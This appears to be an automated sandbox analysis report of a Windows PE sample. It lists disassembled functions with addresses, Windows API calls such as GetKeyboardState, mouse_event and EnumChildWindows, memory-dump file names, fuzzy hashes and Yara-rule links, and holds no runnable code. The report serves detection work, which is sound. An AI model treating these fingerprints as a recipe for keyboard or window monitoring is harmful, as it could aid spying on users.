Uniqueness Score: -1.00%

Function 000000014003B654, Relevance: 4.0, Strings: 3, Instructions: 296COMMON

Download Yara Rule

Strings

., xrefs: 000000014003B90F
, xrefs: 000000014003B8FA
0, xrefs: 000000014003B761

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: $.$0
API String ID: 0-3444660880
Opcode ID: 7faf6b3a0802387ae1a1f4a951c764a9f5dff5361bb01b5595373f707b7bef3d
Instruction ID: afc76e5955cec08a2e310aafdfa5925d1fa8b538d34a1948db0db94718321ab9
Opcode Fuzzy Hash: 7faf6b3a0802387ae1a1f4a951c764a9f5dff5361bb01b5595373f707b7bef3d
Instruction Fuzzy Hash: FCB1D336A0855541FBBB6B2B81513FB6394EBAD7DDF448222FF42571F5EB388882C200

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003B32A, Relevance: 4.0, Strings: 3, Instructions: 267COMMON

Download Yara Rule

Strings

0, xrefs: 000000014003B39D
, xrefs: 000000014003B530
., xrefs: 000000014003B545

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: $.$0
API String ID: 0-3444660880
Opcode ID: df4e1a8de836a0efb5e770a4bc9830c0ee65be3cfc1bc2c2509eebbbde243118
Instruction ID: 529f76eb3511de9e85388212d18fdd28b96532c4e985ef63817c07d37cec0de2
Opcode Fuzzy Hash: df4e1a8de836a0efb5e770a4bc9830c0ee65be3cfc1bc2c2509eebbbde243118
Instruction Fuzzy Hash: AAA1E036A0466541FBBB6A2781513FF63C1EB5C7DDF488126BF82471F6EB38C9819205

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140011052, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26windowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32 ref: 0000000140011080
PostMessageW.USER32 ref: 000000014001113B
PostMessageW.USER32 ref: 0000000140011180

Strings

MZ@, xrefs: 00000001400110AE

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: MessagePost$KeyboardState
String ID: MZ@
API String ID: 857446259-2978689999
Opcode ID: 20cfa61a39722425880bec395ed937b2c49b8af9179bc6618accc7463cc8174e
Instruction ID: 0d7041ce7dd93f22d44043a7b3657cbfc4e988c73f9265e468aa7d2111adc995
Opcode Fuzzy Hash: 20cfa61a39722425880bec395ed937b2c49b8af9179bc6618accc7463cc8174e
Instruction Fuzzy Hash: 70F0A072954AA096E66FC62794513F8B391AB9D3E5F840306BB824B6F7D67AC4449200

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400465D0, Relevance: 3.4, APIs: 2, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31f262ef353b38351f4b968d5d1cad794372509e5dd081e115cd5fc9c8d3b902
Instruction ID: 8cd9e68a7c6af0386916f4c8fd36eb9c8d5621425cd8588278dbb3c7f6dbf277
Opcode Fuzzy Hash: 31f262ef353b38351f4b968d5d1cad794372509e5dd081e115cd5fc9c8d3b902
Instruction Fuzzy Hash: EE02037220468081FB769B37A4503ED27A1E74DBC4F564125EB9A17BF5EF38C891CB0A

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400414B0, Relevance: 3.1, APIs: 2, Instructions: 139COMMON

Download Yara Rule

APIs

Part of subcall function 000000014004E230: GetForegroundWindow.USER32 ref: 000000014004E270
Part of subcall function 000000014004E230: IsWindowVisible.USER32 ref: 000000014004E291

EnumChildWindows.USER32 ref: 000000014004159A

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Window$ChildEnumForegroundVisibleWindows
String ID:
API String ID: 3013317313-0
Opcode ID: 7d55d2f1a04a1c63b9fde52f9226225b9a672f4941fc6bad323c731e46ee3815
Instruction ID: 8dd954b12cd06a11801bda5e3cac4fd2709cc8238aed3151e912f52fb3103ba5
Opcode Fuzzy Hash: 7d55d2f1a04a1c63b9fde52f9226225b9a672f4941fc6bad323c731e46ee3815
Instruction Fuzzy Hash: 70518F72618B9085EB529B26B5403DA67A1F7CDBE4F5A1321FBA943BF5CF38C4418B04

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400132C0, Relevance: 2.1, APIs: 1, Instructions: 551threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140010F60: GetCurrentThreadId.KERNEL32 ref: 0000000140010FAD

GetWindowThreadProcessId.USER32 ref: 0000000140013A52

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Thread$CurrentProcessWindow
String ID:
API String ID: 1042118053-0
Opcode ID: 8ef75c742bfb1125661236784b8f0b37d81d29f6ad2e9cfdeb021c537998dba4
Instruction ID: 3c8eb134d4927d6ba55da218f2b0c2c6c429a98023e2e67114cafec166c6ae1e
Opcode Fuzzy Hash: 8ef75c742bfb1125661236784b8f0b37d81d29f6ad2e9cfdeb021c537998dba4
Instruction Fuzzy Hash: 1232257211C2D146F7B78B26A5527EFAE91A79A3D8F041119FBC10BEFAC63BC5448B10

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400096E0, Relevance: 1.8, Strings: 1, Instructions: 594COMMON

Download Yara Rule

Strings

MZ@, xrefs: 00000001400099ED, 0000000140009E71, 000000014000A0B6

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Thread$Message$CountCreatePeekPostPrioritySleepTick
String ID: MZ@
API String ID: 2785037528-2978689999
Opcode ID: ee0efffe502d5035bbbedbdf8bcd0a589f62f53385322d70126e9c04aea79a21
Instruction ID: 641ea8e45de0cd507819a73865ae9634a363b5d56c535ccf40da9b653c0727f2
Opcode Fuzzy Hash: ee0efffe502d5035bbbedbdf8bcd0a589f62f53385322d70126e9c04aea79a21
Instruction Fuzzy Hash: 555281B26086D085F767CB26E0183F93BE0E75A788F084069EB85077E6DBBDD594C321

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B9420, Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00000001400B9485

Part of subcall function 00000001400B0E6C: _invalid_parameter_noinfo.LIBCMT ref: 00000001400B0E80

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: _get_daylight_invalid_parameter_noinfo
String ID:
API String ID: 474895018-0
Opcode ID: b55fca6f8c9270736f7c68143aa365bef8d1fd43f871617768cd01f6f283c520
Instruction ID: c8dd73a7a037abc5ddb2c116fac1444431cf814027547930cc6400cee29a2c50
Opcode Fuzzy Hash: b55fca6f8c9270736f7c68143aa365bef8d1fd43f871617768cd01f6f283c520
Instruction Fuzzy Hash: 2D71E632704E8146FB778EAB94907E963B1B7983E4F150629BB66876F7DB78C8418700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140062600, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

mouse_event.USER32 ref: 0000000140062712

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 8428a786af9181f0011d9a9e202d87b6b596df4e0287dc501cb2ec51a3068e60
Instruction ID: dae89ec663d1799d717060b9bf22b45ad0ffa06dd757de0199e581dfefa02e38
Opcode Fuzzy Hash: 8428a786af9181f0011d9a9e202d87b6b596df4e0287dc501cb2ec51a3068e60
Instruction Fuzzy Hash: 2C31C031304B9446E7128E6EEE8035DB6C2B78CBC0F244939FB89C7AA5CD75C8959B80

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140014FF0, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140015006

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: 2ef30ae79835b77e0ccf79aa8e01a09d708c42bd880f55148ea96da0280cf32c
Instruction ID: 67fdc40602475c704bb9f622c4b0d68cfcb83783552959575bd6555ce0d4c77b
Opcode Fuzzy Hash: 2ef30ae79835b77e0ccf79aa8e01a09d708c42bd880f55148ea96da0280cf32c
Instruction Fuzzy Hash: B5314976320540CBE74ADF76D4667A937E5E319B48F58822EC6138B6A0DB3AD644CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000014002B25C, Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

SMHD, xrefs: 000000014002B277

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: SMHD
API String ID: 0-3383697735
Opcode ID: 4bf1abdbea53cda2c7fff5a6896b2eed6514dfafe50ce1fb1b861e498f9716fa
Instruction ID: 0cb4b60210421146d0ff841b9ae711132eb3fbab9c382659bc657460dd391a24
Opcode Fuzzy Hash: 4bf1abdbea53cda2c7fff5a6896b2eed6514dfafe50ce1fb1b861e498f9716fa
Instruction Fuzzy Hash: C0B1F67260066085FB67AB2794903FD62A1AB5DBD4F59411AFF494F7F6DA38CC818340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400A7FF8, Relevance: 1.5, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

0, xrefs: 00000001400A81AF

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: cc6d50bd508bb868f3dd72a46553d360af7e38a8381b5d0295897b5cdeb7b01e
Instruction ID: fff1e49bd1eb60acf79081feef86ca9ac0b1dcbd73a792fe6637ff54cd9efc1b
Opcode Fuzzy Hash: cc6d50bd508bb868f3dd72a46553d360af7e38a8381b5d0295897b5cdeb7b01e
Instruction Fuzzy Hash: 9B81D13271064086FABA8A279444BEE23A5E769BC4F141B26FF02976B5D735C8C7DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400861F0, Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

%04d%02d, xrefs: 00000001400863FD

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: %04d%02d
API String ID: 0-2611399059
Opcode ID: 19e026e81d1cf7d96adb7470b8ec07b5d9273758c72f614c3cf56339310fc6c1
Instruction ID: df7e70ae539e5b854176da22c60c51d0053e0bba8859fc4cf2c1d4908f5a7029
Opcode Fuzzy Hash: 19e026e81d1cf7d96adb7470b8ec07b5d9273758c72f614c3cf56339310fc6c1
Instruction Fuzzy Hash: 7051D3A2B3555503DB6E453EAD26BA98847B3DA385F48E635FB42CEFE9D934DB004200

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B04B4, Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

@, xrefs: 00000001400B04F0

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 7defb1eb8f25303ad6d3ceb8ce27eb20d2bbb3cff2650c5cb1969d6a4f2110ba
Instruction ID: a13e3bd7ae85043c9515036f30e4322d8645d569c6f63308c4ae64a1393f9ba5
Opcode Fuzzy Hash: 7defb1eb8f25303ad6d3ceb8ce27eb20d2bbb3cff2650c5cb1969d6a4f2110ba
Instruction Fuzzy Hash: B5417A72310E448AEA59CF6AD8643DA63A1A34CFD0F59A026EF1D87764EE38C546D300

Uniqueness

Uniqueness Score: -1.00%

Function 0095EB07, Relevance: .4, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.305643792.0000000000954000.00000004.00000001.sdmp, Offset: 00954000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4257535749668ba1e300b56671e096368ff4ec4e30518e8835032135ad9c7762
Instruction ID: d516f83a583e5c3f5646e3500c45b5f79d24552fa6d007c8f85c67b044847fed
Opcode Fuzzy Hash: 4257535749668ba1e300b56671e096368ff4ec4e30518e8835032135ad9c7762
Instruction Fuzzy Hash: DEC198A684E3D25FC7078B314C7A6917FB06E23201B1E45DBC8D5CF5E3D2595A0AD362

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400C2698, Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffca7413af0b0dcec78e330af890dc7a1d923522470f70712cf1fbcbee134060
Instruction ID: 4a08a8a5de28f4a8aad9a1ec5d6ffdc165a21b272f836155be651bee21ef25fe
Opcode Fuzzy Hash: ffca7413af0b0dcec78e330af890dc7a1d923522470f70712cf1fbcbee134060
Instruction Fuzzy Hash: CE314DFB94EBC40AF35B967A0C6A38D6F90A356B41F0EC19BE780576D3D12B1C049762

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400C26A8, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3584cad2e6709acb5942c3918160dd2ea2ac9cc4a72e9510c43e19056acb52c
Instruction ID: 0ad4aa5df7ac44ac2fd3f06d9667883aa8f4a4eb90127a6873a8530ca5535866
Opcode Fuzzy Hash: d3584cad2e6709acb5942c3918160dd2ea2ac9cc4a72e9510c43e19056acb52c
Instruction Fuzzy Hash: E0314AFB94EBC40AF35B4A6A0C6A38D6F90B396B41F0EC197E780536D3D12B1C049762

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400C26B0, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6ee58885e0fe419bde549ed0e43f481b232d7a85ae220b8198e122b4da74563
Instruction ID: 1c75cb8feca480456fad7f58c44935a8e5fa5a5da5dfcbdf23d857a7bc69be50
Opcode Fuzzy Hash: c6ee58885e0fe419bde549ed0e43f481b232d7a85ae220b8198e122b4da74563
Instruction Fuzzy Hash: F73157FB94EBC40AF3578A7A0C6A38D6F90A396B40F0EC19BE780536D3D02B1C049752

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400C2648, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fc2de242a41974a38419ac763ff69f7d434035a08d0395543bfd71d0fc1c718
Instruction ID: 25443b852a94ab548d3a3429dd3d9530839dac88557b4b3010514b26d3585f7e
Opcode Fuzzy Hash: 9fc2de242a41974a38419ac763ff69f7d434035a08d0395543bfd71d0fc1c718
Instruction Fuzzy Hash: ADE04FBF54DBC10AF26F453B0C293C41F80A3AF7E6F1D9246679083AF3A6B608064230

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400C2390, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca17fa774b0bdd8ddf54243ee4dd663522473c1ba56a08d5d583b5275c312a47
Instruction ID: a50c14bd2fcf38e8f342ba77be5bd81e96d666fe66efa2b3e31974980770ca65
Opcode Fuzzy Hash: ca17fa774b0bdd8ddf54243ee4dd663522473c1ba56a08d5d583b5275c312a47
Instruction Fuzzy Hash: 9EC012BB40D3D049E20F2A360C213982D40438BBC3F8C805267808BAE3E5BC4A849212

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400C22C0, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
